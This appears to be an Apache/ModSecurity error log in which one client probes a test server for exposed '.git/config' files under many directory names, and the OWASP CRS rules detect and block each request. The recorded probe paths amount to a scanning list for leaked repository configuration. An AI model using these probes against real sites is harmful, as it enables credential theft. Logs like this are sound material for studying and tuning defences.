[Fri May 24 12:48:30.243001 2024] [:error] [pid 3435533] [client 91.215.85.43:44960] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAQAAAAU"]
[Fri May 24 12:48:30.243080 2024] [:error] [pid 3435530] [client 91.215.85.43:45082] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wiki/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wiki/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpgAAAAI"]
[Fri May 24 12:48:30.243209 2024] [:error] [pid 3435533] [client 91.215.85.43:44960] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAQAAAAU"]
[Fri May 24 12:48:30.243310 2024] [:error] [pid 3435530] [client 91.215.85.43:45082] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wiki/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpgAAAAI"]
[Fri May 24 12:48:30.243519 2024] [:error] [pid 3435530] [client 91.215.85.43:45082] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wiki/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpgAAAAI"]
[Fri May 24 12:48:30.244457 2024] [:error] [pid 3439794] [client 91.215.85.43:45168] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /gateway/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/gateway/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBgAAAAc"]
[Fri May 24 12:48:30.245925 2024] [:error] [pid 3439796] [client 91.215.85.43:45118] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /samples/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/samples/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgEwAAAAk"]
[Fri May 24 12:48:30.246095 2024] [:error] [pid 3439795] [client 91.215.85.43:45166] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /demo/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/demo/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgewAAAAg"]
[Fri May 24 12:48:30.246178 2024] [:error] [pid 3439796] [client 91.215.85.43:45118] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/samples/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgEwAAAAk"]
[Fri May 24 12:48:30.246365 2024] [:error] [pid 3439795] [client 91.215.85.43:45166] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/demo/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgewAAAAg"]
[Fri May 24 12:48:30.246381 2024] [:error] [pid 3439796] [client 91.215.85.43:45118] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/samples/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgEwAAAAk"]
[Fri May 24 12:48:30.246589 2024] [:error] [pid 3439795] [client 91.215.85.43:45166] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/demo/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgewAAAAg"]
[Fri May 24 12:48:30.246618 2024] [:error] [pid 3439794] [client 91.215.85.43:45168] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/gateway/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBgAAAAc"]
[Fri May 24 12:48:30.246804 2024] [:error] [pid 3439794] [client 91.215.85.43:45168] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/gateway/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBgAAAAc"]
[Fri May 24 12:48:30.248883 2024] [:error] [pid 3435645] [client 91.215.85.43:45108] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /data/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAGAAAAAY"]
[Fri May 24 12:48:30.249143 2024] [:error] [pid 3435645] [client 91.215.85.43:45108] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAGAAAAAY"]
[Fri May 24 12:48:30.249344 2024] [:error] [pid 3435645] [client 91.215.85.43:45108] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "ZlBwfpuF_OA4eW7yvNbAGAAAAAY"]
[Fri May 24 12:48:30.250699 2024] [:error] [pid 3435528] [client 91.215.85.43:44792] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /live/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/live/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dgAAAAA"]
[Fri May 24 12:48:30.250963 2024] [:error] [pid 3435528] [client 91.215.85.43:44792] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/live/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dgAAAAA"]
[Fri May 24 12:48:30.251173 2024] [:error] [pid 3435528] [client 91.215.85.43:44792] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/live/.git/config"] [unique_id "ZlBwfiKXiBXbyjJPtTG5dgAAAAA"]
[Fri May 24 12:48:30.339523 2024] [:error] [pid 3435531] [client 91.215.85.43:44952] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /s3/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/s3/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKgAAAAM"]
[Fri May 24 12:48:30.339646 2024] [authz_core:error] [pid 3435529] [client 91.215.85.43:44766] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Fri May 24 12:48:30.340017 2024] [:error] [pid 3435531] [client 91.215.85.43:44952] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/s3/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKgAAAAM"]
[Fri May 24 12:48:30.340441 2024] [:error] [pid 3435531] [client 91.215.85.43:44952] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/s3/.git/config"] [unique_id "ZlBwfuuJfDfP1XOJUImQKgAAAAM"]
[Fri May 24 12:48:30.343248 2024] [:error] [pid 3435530] [client 91.215.85.43:44970] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /node_modules/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpwAAAAI"]
[Fri May 24 12:48:30.343289 2024] [:error] [pid 3435533] [client 91.215.85.43:44998] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /database/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAgAAAAU"]
[Fri May 24 12:48:30.343724 2024] [:error] [pid 3435530] [client 91.215.85.43:44970] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpwAAAAI"]
[Fri May 24 12:48:30.343727 2024] [:error] [pid 3435533] [client 91.215.85.43:44998] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAgAAAAU"]
[Fri May 24 12:48:30.343946 2024] [:error] [pid 3435533] [client 91.215.85.43:44998] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.git/config"] [unique_id "ZlBwfgFOO8jRsTgGYPWkAgAAAAU"]
[Fri May 24 12:48:30.343968 2024] [:error] [pid 3435530] [client 91.215.85.43:44970] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.git/config"] [unique_id "ZlBwfjuO8Kiuun1sMFoVpwAAAAI"]
[Fri May 24 12:48:30.344370 2024] [:error] [pid 3435532] [client 91.215.85.43:44682] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v1/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v1/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhcAAAAAQ"]
[Fri May 24 12:48:30.344850 2024] [:error] [pid 3435532] [client 91.215.85.43:44682] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v1/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhcAAAAAQ"]
[Fri May 24 12:48:30.345112 2024] [:error] [pid 3435532] [client 91.215.85.43:44682] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v1/.git/config"] [unique_id "ZlBwftUl7PBHIV1DJKGhcAAAAAQ"]
[Fri May 24 12:48:30.348765 2024] [:error] [pid 3439795] [client 91.215.85.43:44804] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v2/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v2/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgfAAAAAg"]
[Fri May 24 12:48:30.348802 2024] [:error] [pid 3439794] [client 91.215.85.43:44728] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /common/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/common/.git/config"] [unique_id "ZlBwfgFQDxLtnTYBn1LaBwAAAAc"]
[Fri May 24 12:48:30.349065 2024] [:error] [pid 3439795] [client 91.215.85.43:44804] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v2/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgfAAAAAg"]
[Fri May 24 12:48:30.349316 2024] [:error] [pid 3439795] [client 91.215.85.43:44804] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v2/.git/config"] [unique_id "ZlBwfmxChojRwFblBeOgfAAAAAg"]
[Fri May 24 12:48:30.350040 2024] [:error] [pid 3439796] [client 91.215.85.43:44752] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /beta/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgFAAAAAk"]
[Fri May 24 12:48:30.350302 2024] [:error] [pid 3439796] [client 91.215.85.43:44752] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgFAAAAAk"]
[Fri May 24 12:48:30.350532 2024] [:error] [pid 3439796] [client 91.215.85.43:44752] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/beta/.git/config"] [unique_id "ZlBwfifcSRnYInexrFNgFAAAAAk"]
